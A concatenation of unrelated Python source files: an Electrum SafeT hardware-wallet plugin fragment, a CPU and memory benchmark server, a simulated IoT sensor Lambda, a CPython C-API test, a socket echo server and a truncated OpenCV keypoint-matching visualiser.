(TIM_PRIVKEY, _("Upload a master private key"))
]
def f(method):
import threading
settings = self.request_safe_t_init_settings(wizard, method, self.device)
t = threading.Thread(target=self._initialize_device_safe, args=(settings, method, device_id, wizard, handler))
t.setDaemon(True)
t.start()
exit_code = wizard.loop.exec_()
if exit_code != 0:
# this method (initialize_device) was called with the expectation
# of leaving the device in an initialized state when finishing.
# signal that this is not the case:
raise UserCancelled()
wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f)
def _initialize_device_safe(self, settings, method, device_id, wizard, handler):
exit_code = 0
try:
self._initialize_device(settings, method, device_id, wizard, handler)
except UserCancelled:
exit_code = 1
except BaseException as e:
self.logger.exception('')
handler.show_error(repr(e))
exit_code = 1
finally:
wizard.loop.exit(exit_code)
@runs_in_hwd_thread
def _initialize_device(self, settings, method, device_id, wizard, handler):
item, label, pin_protection, passphrase_protection = settings
if method == TIM_RECOVER:
handler.show_error(_(
"You will be asked to enter 24 words regardless of your "
"seed's actual length. If you enter a word incorrectly or "
"misspell it, you cannot change it or go back - you will need "
"to start again from the beginning.\n\nSo please enter "
"the words carefully!"),
blocking=True)
language = 'english'
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
if not client:
raise Exception(_("The device was disconnected."))
if method == TIM_NEW:
strength = 64 * (item + 2) # 128, 192 or 256
u2f_counter = 0
skip_backup = False
client.reset_device(True, strength, passphrase_protection,
pin_protection, label, language,
u2f_counter, skip_backup)
elif method == TIM_RECOVER:
word_count = 6 * (item + 2) # 12, 18 or 24
client.step = 0
client.recovery_device(word_count, passphrase_protection,
pin_protection, label, language)
elif method == TIM_MNEMONIC:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_mnemonic(str(item), pin,
passphrase_protection,
label, language)
else:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_xprv(item, pin, passphrase_protection,
label, language)
def _make_node_path(self, xpub, address_n):
bip32node = BIP32Node.from_xkey(xpub)
node = self.types.HDNodeType(
depth=bip32node.depth,
fingerprint=int.from_bytes(bip32node.fingerprint, 'big'),
child_num=int.from_bytes(bip32node.child_number, 'big'),
chain_code=bip32node.chaincode,
public_key=bip32node.eckey.get_public_key_bytes(compressed=True),
)
return self.types.HDNodePathType(node=node, address_n=address_n)
def setup_device(self, device_info, wizard, purpose):
device_id = device_info.device.id_
client = self.scan_and_create_client_for_device(device_id=device_id, wizard=wizard)
if not device_info.initialized:
self.initialize_device(device_id, wizard, client.handler)
wizard.run_task_without_blocking_gui(
task=lambda: client.get_xpub("m", 'standard'))
client.used()
return client
def get_xpub(self, device_id, derivation, xtype, wizard):
if xtype not in self.SUPPORTED_XTYPES:
raise ScriptTypeNotSupported(_('This type of script is not supported with {}.').format(self.device))
client = self.scan_and_create_client_for_device(device_id=device_id, wizard=wizard)
xpub = client.get_xpub(derivation, xtype)
client.used()
return xpub
def get_safet_input_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return self.types.InputScriptType.SPENDWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return self.types.InputScriptType.SPENDP2SHWITNESS
if electrum_txin_type in ('p2pkh',):
return self.types.InputScriptType.SPENDADDRESS
if electrum_txin_type in ('p2sh',):
return self.types.InputScriptType.SPENDMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def get_safet_output_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return self.types.OutputScriptType.PAYTOWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return self.types.OutputScriptType.PAYTOP2SHWITNESS
if electrum_txin_type in ('p2pkh',):
return self.types.OutputScriptType.PAYTOADDRESS
if electrum_txin_type in ('p2sh',):
return self.types.OutputScriptType.PAYTOMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
@runs_in_hwd_thread
def sign_transaction(self, keystore, tx: PartialTransaction, prev_tx):
self.prev_tx = prev_tx
client = self.get_client(keystore)
inputs = self.tx_inputs(tx, for_sig=True, keystore=keystore)
outputs = self.tx_outputs(tx, keystore=keystore)
signatures = client.sign_tx(self.get_coin_name(), inputs, outputs,
lock_time=tx.locktime, version=tx.version)[0]
signatures = [(bh2u(x) + '01') for x in signatures]
tx.update_signatures(signatures)
@runs_in_hwd_thread
def show_address(self, wallet, address, keystore=None):
if keystore is None:
keystore = wallet.get_keystore()
if not self.show_address_helper(wallet, address, keystore):
return
client = self.get_client(keystore)
if not client.atleast_version(1, 0):
keystore.handler.show_error(_("Your device firmware is too old"))
return
deriv_suffix = wallet.get_address_index(address)
derivation = keystore.get_derivation_prefix()
address_path = "%s/%d/%d"%(derivation, *deriv_suffix)
address_n = client.expand_path(address_path)
script_type = self.get_safet_input_script_type(wallet.txin_type)
# prepare multisig, if available:
xpubs = wallet.get_master_public_keys()
if len(xpubs) > 1:
pubkeys = wallet.get_public_keys(address)
# sort xpubs using the order of pubkeys
sorted_pairs = sorted(zip(pubkeys, xpubs))
multisig = self._make_multisig(
wallet.m,
[(xpub, deriv_suffix) for pubkey, xpub in sorted_pairs])
else:
multisig = None
client.get_address(self.get_coin_name(), address_n, True, multisig=multisig, script_type=script_type)
def tx_inputs(self, tx: Transaction, *, for_sig=False, keystore: 'SafeTKeyStore' = None):
inputs = []
for txin in tx.inputs():
txinputtype = self.types.TxInputType()
if txin.is_coinbase_input():
prev_hash = b"\x00"*32
prev_index = 0xffffffff # signed int -1
else:
if for_sig:
assert isinstance(tx, PartialTransaction)
assert isinstance(txin, PartialTxInput)
assert keystore
if len(txin.pubkeys) > 1:
xpubs_and_deriv_suffixes = get_xpubs_and_der_suffixes_from_txinout(tx, txin)
multisig = self._make_multisig(txin.num_sig, xpubs_and_deriv_suffixes)
else:
multisig = None
script_type = self.get_safet_input_script_type(txin.script_type)
txinputtype = self.types.TxInputType(
script_type=script_type,
multisig=multisig)
my_pubkey, full_path = keystore.find_my_pubkey_in_txinout(txin)
if full_path:
txinputtype._extend_address_n(full_path)
prev_hash = txin.prevout.txid
prev_index = txin.prevout.out_idx
if txin.value_sats() is not None:
txinputtype.amount = txin.value_sats()
txinputtype.prev_hash = prev_hash
txinputtype.prev_index = prev_index
if txin.script_sig is not None:
txinputtype.script_sig = txin.script_sig
txinputtype.sequence = txin.nsequence
inputs.append(txinputtype)
return inputs
def _make_multisig(self, m, xpubs):
if len(xpubs) == 1:
return None
pubkeys = [self._make_node_path(xpub, deriv) for xpub, deriv in xpubs]
return self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * len(pubkeys),
m=m)
def tx_outputs(self, tx: PartialTransaction, *, keystore: 'SafeTKeyStore'):
def create_output_by_derivation():
script_type = self.get_safet_output_script_type(txout.script_type)
if len(txout.pubkeys) > 1:
xpubs_and_deriv_suffixes = get_xpubs_and_der_suffixes_from_txinout(tx, txout)
multisig = self._make_multisig(txout.num_sig, xpubs_and_deriv_suffixes)
else:
multisig = None
my_pubkey, full_path = keystore.find_my_pubkey_in_txinout(txout)
assert full_path
txoutputtype = self.types.TxOutputType(
multisig=multisig,
amount=txout.value,
address_n=full_path,
script_type=script_type)
return txoutputtype
def create_output_by_address():
txoutputtype = self.types.TxOutputType()
txoutputtype.amount = txout.value
if address:
txoutputtype.script_type = self.types.OutputScriptType.PAYTOADDRESS
txoutputtype.address = address
else:
txoutputtype.script_type = self.types.OutputScriptType.PAYTOOPRETURN
txoutputtype.op_return_data = trezor_validate_op_return_output_and_get_data(txout)
return txoutputtype
outputs = []
has_change = False
any_output_on_change_branch = is_any_tx_output_on_change_branch(tx)
for txout in tx.outputs():
address = txout.address
use_create_by_derivation = False
if txout.is_mine and not has_change:
# prioritise hiding outputs on the 'change' branch from user
# because no more than one change address allowed
# note: ^ restriction can be removed once we require fw
# that has https://github.com/trezor/trezor-mcu/pull/306
if txout.is_change == any_output_on_change_branch:
use_create_by_derivation = True
has_change = True
if use_create_by_derivation:
txoutputtype = create_output_by_derivation()
else:
txoutputtype = create_output_by_address()
outputs.append(txoutputtype)
return outputs
def electrum_tx_to_txtype(self, tx: Optional[Transaction]):
t = self.types.TransactionType()
if tx is None:
# probably for segwit input and we don't need this prev txn
return t
tx.deserialize()
t.version = tx.version
t.lock_time = tx.locktime
inputs = self.tx_inputs(tx)
t._extend_inputs(inputs)
for out in tx.outputs():
o = t._add_bin_outputs()
o.amount = out.value
o.script_pubkey = out.scriptpubkey
return t
# This function is called from the TREZOR libraries (via tx_api)
def get_tx(self, tx_hash):
tx = self.prev_tx[tx_hash]
return self.electrum_tx_to_txtype(tx)
|
main.py
|
#!/usr/bin/env python3
from timeit import Timer
import multiprocessing
import math
import time
import cherrypy
import os
from datetime import datetime
from pythonping import ping
import requests
try:
logFilePath = os.environ["LOGFILE"]
logFile = open(logFilePath, "a", 1)
print("Writing logs to " + logFilePath)
except KeyError as e:
print("Logging to file is disabled, to enable provide a LOGFILE environment variable")
except Exception as e:
print(repr(e))
def log(text):
now = datetime.now()
toLog = now.strftime("%H:%M:%S - ") + text
if "LOGFILE" in os.environ:
logFile.write(toLog + "\n")
print(toLog)
def fibonacci(n):
a = 0
b = 1
r = -1
if n < 0:
log("Incorrect input")
return
elif n == 0:
r = a
elif n == 1:
r = b
else:
for i in range(2,n):
c = a + b
a = b
b = c
r = b
# log("Fibonacci number {0!s} is {1!s}".format(n, r))
def parallized_fibonacci_benchmark(i, runs_per_core, measurements):
t = Timer(lambda: fibonacci(10000))
measurements[i] = t.repeat(number=runs_per_core, repeat=3)
def send_benchmark_completed_message(event_name):
if "EVENT_ENDPOINT" in os.environ:
url = os.environ["EVENT_ENDPOINT"] + "?event_name=" + event_name
log("Sending benchmark completed message to " + url)
x = requests.get(url)
log("Status code was " + str(x.status_code))
class Server(object):
@cherrypy.expose
def run(self, max_memory=10):
single_run(int(max_memory))
return("Run completed, results are written to console.")
@cherrypy.expose
def prepare(self, max_memory=10):
self.prepared_mem = int(max_memory)
log("Prepared run, max_memory is " + str(max_memory))
return("Prepared")
@cherrypy.expose
def state(self, state_name="[was not provided by server]"):
log("#############################")
log("#############################")
log("Now in state " + state_name)
log("#############################")
log("#############################")
p = multiprocessing.Process(target=single_run, args=(self.prepared_mem,))
p.start()
return("Ok")
def single_run(max_memory):
start_printing = max(max_memory - 100, int(max_memory / 2))
log("Starting CPU benchmark")
manager = multiprocessing.Manager()
measurements = manager.dict()
processes = []
cores = multiprocessing.cpu_count()
for i in range(0,cores):
runs_per_core = int(2000 / cores)
p = multiprocessing.Process(target=parallized_fibonacci_benchmark, args=(i,runs_per_core,measurements))
processes.append(p)
p.start()
for process in processes:
process.join()
# determine total results for all operations
results = [0.0, 0.0, 0.0]
for m in measurements.values():
results[0] = results[0] + m[0]
results[1] = results[1] + m[1]
results[2] = results[2] + m[2]
mean = sum(results) / len(results)
var = sum(pow(x-mean,2) for x in results) / len(results)
std = math.sqrt(var) # standard deviation
log("CPU-Time needed for CPU benchmark: {0!s}s (SD={1!s}s)".format(mean, std))
send_benchmark_completed_message("cpu")
log("Trying to allocate up to {1!s}mb of memory, printing allocated amount starting at {0!s}mb:".format(start_printing, max_memory))
longstring = []
for x in range(1, max_memory + 1):
longstring.append("1" * 10**6)
if (x >= start_printing):
log("{0!s}mb".format(len(longstring)))
longstring = []
log("\nWas able to allocate all needed memory")
send_benchmark_completed_message("memory")
def ping_helper(targetAddress):
while True:
log("Ping to {0!s} is {1!s}ms".format(targetAddress, ping(targetAddress, count=1).rtt_avg_ms))
time.sleep(2)
def webserver_helper():
conf = {
"global": {
"server.socket_port": int(os.environ["PORT"]),
"server.socket_host": "0.0.0.0"
}
}
cherrypy.quickstart(Server(), "/", conf)
if __name__ == "__main__":
if "PING" in os.environ:
log("Starting to ping " + os.environ["PING"])
pingP = multiprocessing.Process(target=ping_helper, args=(os.environ["PING"],))
pingP.start()
else:
log("Pinging is disabled, to enable provide a PING environment variable that contains the target address")
if "PORT" in os.environ:
log("Starting CRExplorer webserver at port {0!s}, a request could look like http://localhost:{0!s}/run?max_memory=30".format(os.environ["PORT"]))
serverP = multiprocessing.Process(target=webserver_helper)
serverP.start()
input("Press a key to exit")
os.exit(0)
else:
# parse input
memory_s = input("How much megabyte of memory should we allocate? Enter a number: ")
max_memory = int(memory_s)
single_run(max_memory)
os._exit(0)
|
sensor_source.py
|
# Greengrass lambda source -sensor source
import json
import logging
from threading import Thread, Lock
from time import sleep, time
from random import gauss
import greengrasssdk
import flask
from flask import request, jsonify
# Configure logger
logger = logging.getLogger()
logger.setLevel(logging.WARN)
client = greengrasssdk.client("iot-data")
lock = Lock()
generate_sensor_data = True
app = flask.Flask(__name__)
@app.route("/api/v1/sensor/data/enable", methods=["GET"])
def api_sensor_data_enable():
"""Enable generation of sensor data"""
global generate_sensor_data
lock.acquire()
generate_sensor_data = True
lock.release()
return jsonify({"response": "sensor data enabled"})
@app.route("/api/v1/sensor/data/disable", methods=["GET"])
def api_sensor_data_disable():
"""Disables generation of sensor data"""
global generate_sensor_data
lock.acquire()
generate_sensor_data = False
lock.release()
return jsonify({"response": "sensor data disabled"})
@app.route("/api/v1/sensor/data/status", methods=["GET"])
def api_sensor_data_status():
"""Returns current status of sensor data generation"""
global generate_sensor_data
lock.acquire()
status = generate_sensor_data
lock.release()
return jsonify({"response": f"sensor data generation is set to {status}"})
def simulated_data():
"""Randomly generate data and timestamp"""
hertz = float("%.2f" % (gauss(1000, 2)))
temperature = float("%.2f" % (gauss(80, 4)))
timestamp = float("%.4f" % (time()))
return {"hertz": hertz, "temperature": temperature, "timestamp": timestamp}
def api_server():
"""Run and process API requests as separate thread"""
Thread(
target=app.run, kwargs={"host": "0.0.0.0", "port": 8180, "threaded": True}
).start()
def sensor_data_server():
""" Generates and publishes sensor data if enabled
Data generation is at 10 messages per second, with each message containing
values for temperature and humidity.
"""
while True:
lock.acquire()
if generate_sensor_data:
lock.release()
data = simulated_data()
# Publish data to Lambda Producer directly
try:
client.publish(
topic="sensor_data", qos=0, payload=json.dumps(data).encode("utf-8")
)
except Exception as e:
logger.error(f"Error appending: {e}")
sleep(0.05)
continue
else:
lock.release()
# Data generation disabled, pause before checking again
sleep(0.05)
def app_startup():
"""Startup all separate threads"""
logger.info("Starting API")
api_thread = Thread(target=api_server, args=[])
api_thread.start()
logger.info("Starting simulated sensor data")
sensor_data_thread = Thread(target=sensor_data_server)
sensor_data_thread.start()
app_startup()
def main(event, context):
"""Called per invoke, we should never see this (long running Lambda)"""
return
|
test_capi.py
|
# Run the _testcapi module tests (tests for the Python/C API): by defn,
# these are all functions _testcapi exports whose name begins with 'test_'.
from __future__ import with_statement
import sys
import time
import random
import unittest
import threading
from test import support
import _testcapi
def testfunction(self):
"""some doc"""
return self
class InstanceMethod:
id = _testcapi.instancemethod(id)
testfunction = _testcapi.instancemethod(testfunction)
class CAPITest(unittest.TestCase):
def test_instancemethod(self):
inst = InstanceMethod()
self.assertEqual(id(inst), inst.id())
self.assert_(inst.testfunction() is inst)
self.assertEqual(inst.testfunction.__doc__, testfunction.__doc__)
self.assertEqual(InstanceMethod.testfunction.__doc__, testfunction.__doc__)
InstanceMethod.testfunction.attribute = "test"
self.assertEqual(testfunction.attribute, "test")
self.assertRaises(AttributeError, setattr, inst.testfunction, "attribute", "test")
class TestPendingCalls(unittest.TestCase):
def pendingcalls_submit(self, l, n):
def callback():
#this function can be interrupted by thread switching so let's
#use an atomic operation
l.append(None)
for i in range(n):
time.sleep(random.random()*0.02) #0.01 secs on average
#try submitting callback until successful.
#rely on regular interrupt to flush queue if we are
#unsuccessful.
while True:
if _testcapi._pending_threadfunc(callback):
break;
def pendingcalls_wait(self, l, n, context = None):
#now, stick around until l[0] has grown to 10
count = 0;
while len(l) != n:
#this busy loop is where we expect to be interrupted to
#run our callbacks. Note that callbacks are only run on the
#main thread
if False and support.verbose:
print("(%i)"%(len(l),),)
for i in range(1000):
a = i*i
if context and not context.event.is_set():
continue
count += 1
self.failUnless(count < 10000,
"timeout waiting for %i callbacks, got %i"%(n, len(l)))
if False and support.verbose:
print("(%i)"%(len(l),))
def test_pendingcalls_threaded(self):
#do every callback on a separate thread
n = 32 #total callbacks
threads = []
class foo(object):pass
context = foo()
context.l = []
context.n = 2 #submits per thread
context.nThreads = n // context.n
context.nFinished = 0
context.lock = threading.Lock()
context.event = threading.Event()
for i in range(context.nThreads):
t = threading.Thread(target=self.pendingcalls_thread, args = (context,))
t.start()
threads.append(t)
self.pendingcalls_wait(context.l, n, context)
for t in threads:
t.join()
def pendingcalls_thread(self, context):
try:
self.pendingcalls_submit(context.l, context.n)
finally:
with context.lock:
context.nFinished += 1
nFinished = context.nFinished
if False and support.verbose:
print("finished threads: ", nFinished)
if nFinished == context.nThreads:
context.event.set()
def test_pendingcalls_non_threaded(self):
#again, just using the main thread, likely they will all be dispathced at
#once. It is ok to ask for too many, because we loop until we find a slot.
#the loop can be interrupted to dispatch.
#there are only 32 dispatch slots, so we go for twice that!
l = []
n = 64
self.pendingcalls_submit(l, n)
self.pendingcalls_wait(l, n)
# Bug #6012
class Test6012(unittest.TestCase):
def test(self):
self.assertEqual(_testcapi.argparsing("Hello", "World"), 1)
def test_main():
support.run_unittest(CAPITest)
for name in dir(_testcapi):
if name.startswith('test_'):
test = getattr(_testcapi, name)
if support.verbose:
print("internal", name)
test()
# some extra thread-state tests driven via _testcapi
def TestThreadState():
if support.verbose:
print("auto-thread-state")
idents = []
def callback():
idents.append(_thread.get_ident())
_testcapi._test_thread_state(callback)
a = b = callback
time.sleep(1)
# Check our main thread is in the list exactly 3 times.
if idents.count(_thread.get_ident()) != 3:
raise support.TestFailed(
"Couldn't find main thread correctly in the list")
try:
_testcapi._test_thread_state
have_thread_state = True
except AttributeError:
have_thread_state = False
if have_thread_state:
import _thread
import time
TestThreadState()
import threading
t = threading.Thread(target=TestThreadState)
t.start()
t.join()
support.run_unittest(TestPendingCalls, Test6012)
if __name__ == "__main__":
test_main()
|
main.py
|
import socket
import logging.config
from datetime import datetime
from multiprocessing import Process
from signal import signal, SIGTERM
LISTEN_PORT = 8000
ECHO_LOG_PATH = './logs/sessions/'
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'formatters': {
'simple': {
'format': '%(levelname)3.3s [%(name)s:%(funcName)s] %(message)s',
},
},
'handlers': {
'console': {
'class': 'logging.StreamHandler',
'level': 'INFO',
'formatter': 'simple',
'stream': 'ext://sys.stdout',
},
'file': {
'class': 'logging.FileHandler',
'level': 'INFO',
'filename': './logs/echo_server_log.log',
'formatter': 'simple',
},
},
'root': {
'level': 'INFO',
'handlers': ['console', 'file'],
'propagate': True,
}
}
logging.config.dictConfig(LOGGING)
logger = logging.getLogger('')
def keep_alive(sk, addr, callback):
signal(SIGTERM, callback)
log_filename = datetime.now().strftime('%Y-%m-%d_%H:%M:%S_{}').format(addr)
with open(ECHO_LOG_PATH + log_filename, 'w') as log_file:
while True:
data = sk.recv(2048)
if not data:
callback()
return
sk.send(data)
log_file.write(str(data)[2:-1])
def get_termination_callback(sk):
def callback():
sk.shutdown(1)
sk.close()
return callback
def setup():
connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connection.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
connection.bind(('0.0.0.0', LISTEN_PORT))
connection.listen(0)
thread_list = []
try:
while True:
new_socket, address = connection.accept()
addr, port = address
logger.info('connection from {}:{}'.format(addr, port))
callback = get_termination_callback(new_socket)
p = Process(target=keep_alive, args=(new_socket, addr, callback))
p.start()
thread_list.append(p)
except KeyboardInterrupt:
for p in thread_list:
p.terminate()
if __name__ == "__main__":
try:
setup()
except:
logger.exception('Something went wrong')
|
prototype_restoration.py
|
from __future__ import division
from __future__ import print_function
# ---------------------------- IMPORTS ---------------------------- #
# multiprocessing
from builtins import zip
from builtins import range
from builtins import object
from past.utils import old_div
import itertools as it
from multiprocessing.pool import ThreadPool as Pool
# three-party
import cv2
import numpy as np
# custom
from RRtool.RRtoolbox.lib import plotter, cache, config, image
from RRtool.RRtoolbox import filter,basic as ar
from RRtool.RRtoolbox.lib.arrayops import convert
# ---------------------------- GLOBALS ---------------------------- #
cpc = cv2.getNumberOfCPUs()
print("configured to use {} cpus".format(cpc))
pool = Pool(processes = cpc) # DO NOT USE IT when module is imported and this runs with it. It creates a deadlock"
feature_name = 'sift-flann'
paths = config.ConfigFile()
# ---------------------------- DECORATORS ---------------------------- #
def getalfa(foregray,backgray,window = None):
""" get alfa transparency for merging to retinal images
:param foregray: image on top
:param backgray: image at bottom
:param window: window used to customizing alfa, values go from 0 for transparency to any value
where the maximum is visible i.e a window with all the same values does nothing.
a binary image can be used, where 0 is transparent and 1 is visible.
If not window is given alfa is left as intended.
:return: float window modified by alfa
"""
normalize = filter.normalize
normsigmoid = filter.normsigmoid
backmask = normalize(normsigmoid(backgray,10,180)+normsigmoid(backgray,3.14,192)+normsigmoid(backgray,-3.14,45))
foremask = normalize(normsigmoid(foregray,-1,242)*normsigmoid(foregray,3.14,50))
foremask = normalize(foremask * backmask)
foremask[foremask>0.9] = 2.0
ksize = (21,21)
foremask = normalize(cv2.blur(foremask,ksize))
if window is not None: foremask *= normalize(window)
return foremask
# ----------------------------VISUALIZER FUNCTIONS---------------------------- #
def matchExplorer(win, img1, img2, kp_pairs, status = None, H = None, show=True):
# functions
## GET INITIAL VISUALIZATION
if len(img1.shape)<3:
img1 = cv2.cvtColor(img1,cv2.COLOR_GRAY2BGR)
if len(img2.shape)<3:
img2 = cv2.cvtColor(img2,cv2.COLOR_GRAY2BGR)
h1, w1 = img1.shape[:2] # obtaining image1 dimensions
h2, w2 = img2.shape[:2] # obtaining image2 dimensions
# imgf and imgb will be visualized horizontally (left-right)
vis = np.zeros((max(h1, h2), w1+w2,3), np.uint8) # making visualization image
vis[:h1, :w1] = img1 # imgf at the left of vis
vis[:h2, w1:w1+w2] = img2 # imgf at the right of vis
if status is None:
status = np.ones(len(kp_pairs), np.bool_) # making sure every pair of keypoints is graphed
kp_pairs = [(dict2keyPoint(i),dict2keyPoint(j)) for i,j in kp_pairs]
p1 = np.int32([kpp[0].pt for kpp in kp_pairs]) # pair of coordinates for imgf
p2 = np.int32([kpp[1].pt for kpp in kp_pairs]) + (w1, 0) # pair of coordinates for imgb
corners = np.float32([[0, 0], [w1, 0], [w1, h1], [0, h1]])
corners = np.int32(cv2.perspectiveTransform(corners.reshape(1, -1, 2), H).reshape(-1, 2) + (w1, 0))
def drawline(self):
vis = self.rimg
self.thick = int(filter.sigmoid(vis.shape[0] * vis.shape[1], 1723567, 8080000, 5, 1))
if H is not None: # enclosing object
rcorners = np.array([self.real2render(corner[0],corner[1]) for corner in corners])
cv2.polylines(vis, [rcorners], True, self.framecolor) # draw rendered TM encasing
rp1 = []
rp2 = []
for (x1, y1), (x2, y2), inlier in zip(p1, p2, status):
rx1,ry1 = self.real2render(x1,y1) # real to render
rx2,ry2 = self.real2render(x2,y2) # real to render
rp1.append((rx1,ry1))
rp2.append((rx2,ry2))
r = self.thick
if inlier and self.showgoods: # drawing circles (good keypoints)
col = self.goodcolor
cv2.circle(vis, (rx1, ry1), r, col, -1) # for left keypoint (imgf)
cv2.circle(vis, (rx2, ry2), r, col, -1) # for right keypoint (imgf)
elif self.showbads: # drawing x marks (wrong keypoints)
col = self.badcolor
thickness = r
# for left keypoint (imgf)
cv2.line(vis, (rx1-r, ry1-r), (rx1+r, ry1+r), col, thickness)
cv2.line(vis, (rx1-r, ry1+r), (rx1+r, ry1-r), col, thickness)
# for right keypoint (imgf)
cv2.line(vis, (rx2-r, ry2-r), (rx2+r, ry2+r), col, thickness)
cv2.line(vis, (rx2-r, ry2+r), (rx2+r, ry2-r), col, thickness)
# drawing lines for non-onmouse event
self.rp1 = np.int32(rp1)
self.rp2 = np.int32(rp2)
self.vis0 = vis.copy() # saving state of the visualization for onmouse event
# get rendered kp_pairs
self.kp_pairs2 = apply2kp_pairs(kp_pairs,self.real2render,self.real2render)
# drawing lines for non-onmouse event
for (rx1, ry1), (rx2, ry2), inlier in zip(rp1, rp2, status):
if inlier and self.showgoods:
cv2.line(vis, (rx1, ry1), (rx2, ry2), self.goodcolor,r)
self.vis = vis.copy() # visualization with all inliers
def drawrelation(self):
if self.flags & cv2.EVENT_FLAG_LBUTTON:
x,y = self.rx, self.ry
cur_vis = self.vis0.copy() # actual visualization
r = self.thick + 8 # proximity to keypoint
m = (ar.anorm(self.rp1 - (x, y)) < r) | (ar.anorm(self.rp2 - (x, y)) < r)
idxs = np.where(m)[0] # get indexes near pointer
kp1s, kp2s = [], []
for i in idxs: # for all keypints near pointer
(rx1, ry1), (rx2, ry2) = self.rp1[i], self.rp2[i] # my keypoint
col = (self.badcolor, self.goodcolor)[status[i]] # choosing False=red,True=green
cv2.line(cur_vis, (rx1,ry1), (rx2,ry2), col, self.thick) # drawing line
# keypoints to show on event
kp1, kp2 = self.kp_pairs2[i]
kp1s.append(kp1)
kp2s.append(kp2)
# drawing keypoints near pointer for imgf and imgb
cur_vis = cv2.drawKeypoints(cur_vis, kp1s, flags=4, color=self.kpcolor)
cur_vis = cv2.drawKeypoints(cur_vis, kp2s, flags=4, color=self.kpcolor)
self.rimg = cur_vis
else:
self.rimg = self.vis
if self.y is not None and self.x is not None:
self.builtinplot(self.sample[self.y,self.x])
def randomColor():
return (np.random.randint(0,255), np.random.randint(0,255), np.random.randint(0,255))
def mousefunc(self):
if self.builtincontrol():
self.updaterenderer()
drawline(self)
if self.mousemoved:
drawrelation(self)
def keyfunc(self):
if self.builtincmd():
drawline(self)
if self.y is not None and self.x is not None:
self.builtinplot(self.img[self.y,self.x])
else:
self.builtinplot()
self = plotter.plotim(win, vis)
self.mousefunc = mousefunc
self.keyfunc = keyfunc
self.showgoods = True
self.showbads = False
self.__dict__.update(image.colors)
self.randomColor = randomColor
self.goodcolor = self.green
self.badcolor = self.red
self.kpcolor = self.orange
self.framecolor = self.blue
self.cmdlist.extend(["showgoods","showbads","framecolor","kpcolor","badcolor","goodcolor"])
drawline(self)
# show window
if show: self.show()
return self.rimg # return coordinates
def explore_match(win, img1, img2, kp_pairs, status = None, H = None, show=True):
"""
This function draws a set of keypoint pairs obtained on a match method of a descriptor
on two images imgf and imgb
:param win: window's name (str)
:param img1: image1 (numpy array)
:param img2: image2 (numpy array)
:param kp_pairs: zip(keypoint1, keypoint2)
:param status: obtained from cv2.findHomography
:param H: obtained from cv2.findHomography (default=None)
:return: vis (image with matching result) (default=None)
"""
# colors to use
green = (0, 255, 0)
red = (0, 0, 255)
white = (255, 255, 255)
kp_color = (51, 103, 236)
if len(img1.shape)<3:
img1 = cv2.cvtColor(img1,cv2.COLOR_GRAY2BGR)
if len(img2.shape)<3:
img2 = cv2.cvtColor(img2,cv2.COLOR_GRAY2BGR)
h1, w1 = img1.shape[:2] # obtaining image1 dimensions
h2, w2 = img2.shape[:2] # obtaining image2 dimensions
# imgf and imgb will be visualized horizontally (left-right)
vis = np.zeros((max(h1, h2), w1+w2,3), np.uint8) # making visualization image
vis[:h1, :w1] = img1 # imgf at the left of vis
vis[:h2, w1:w1+w2] = img2 # imgf at the right of vis
#vis = cv2.cvtColor(vis, cv2.COLOR_GRAY2BGR) # changing color attribute to background image
if H is not None: # enclosing object
corners = np.float32([[0, 0], [w1, 0], [w1, h1], [0, h1]])
corners = np.int32( cv2.perspectiveTransform(corners.reshape(1, -1, 2), H).reshape(-1, 2) + (w1, 0) )
cv2.polylines(vis, [corners], True, red)
if status is None:
status = np.ones(len(kp_pairs), np.bool_) # making sure every pair of keypoints is graphed
kp_pairs = [(dict2keyPoint(i),dict2keyPoint(j)) for i,j in kp_pairs]
p1 = np.int32([kpp[0].pt for kpp in kp_pairs]) # pair of coordinates for imgf
p2 = np.int32([kpp[1].pt for kpp in kp_pairs]) + (w1, 0) # pair of coordinates for imgb
thick = int(filter.sigmoid(vis.shape[0] * vis.shape[1], 1723567, 8080000, 5, 1))
for (x1, y1), (x2, y2), inlier in zip(p1, p2, status):
if inlier: # drawing circles (good keypoints)
col = green
cv2.circle(vis, (x1, y1), thick, col, -1) # for left keypoint (imgf)
cv2.circle(vis, (x2, y2), thick, col, -1) # for right keypoint (imgf)
else: # drawing x marks (wrong keypoints)
col = red
r = thick
thickness = thick
# for left keypoint (imgf)
cv2.line(vis, (x1-r, y1-r), (x1+r, y1+r), col, thickness)
cv2.line(vis, (x1-r, y1+r), (x1+r, y1-r), col, thickness)
# for right keypoint (imgf)
cv2.line(vis, (x2-r, y2-r), (x2+r, y2+r), col, thickness)
cv2.line(vis, (x2-r, y2+r), (x2+r, y2-r), col, thickness)
vis0 = vis.copy() # saving state of the visualization for onmouse event
# drawing lines for non-onmouse event
for (x1, y1), (x2, y2), inlier in zip(p1, p2, status):
if inlier:
cv2.line(vis, (x1, y1), (x2, y2), green,thick)
if show:
cv2.namedWindow(win,cv2.WINDOW_NORMAL) # Can be resized
cv2.imshow(win, vis) # show static image as visualization for non-onmouse event
def onmouse(event, x, y, flags, param):
cur_vis = vis # actual visualization. lines drawed in it
if flags & cv2.EVENT_FLAG_LBUTTON: # if onmouse
cur_vis = vis0.copy() # points and perspective drawed in it
r = thick+8 # proximity to keypoint
m = (ar.anorm(p1 - (x, y)) < r) | (ar.anorm(p2 - (x, y)) < r)
idxs = np.where(m)[0] # get indexes near pointer
kp1s, kp2s = [], []
for i in idxs: # for all keypints near pointer
(x1, y1), (x2, y2) = p1[i], p2[i] # my keypoint
col = (red, green)[status[i]] # choosing False=red,True=green
cv2.line(cur_vis, (x1, y1), (x2, y2), col,thick) # drawing line
# keypoints to show on event
kp1, kp2 = kp_pairs[i]
kp1s.append(kp1)
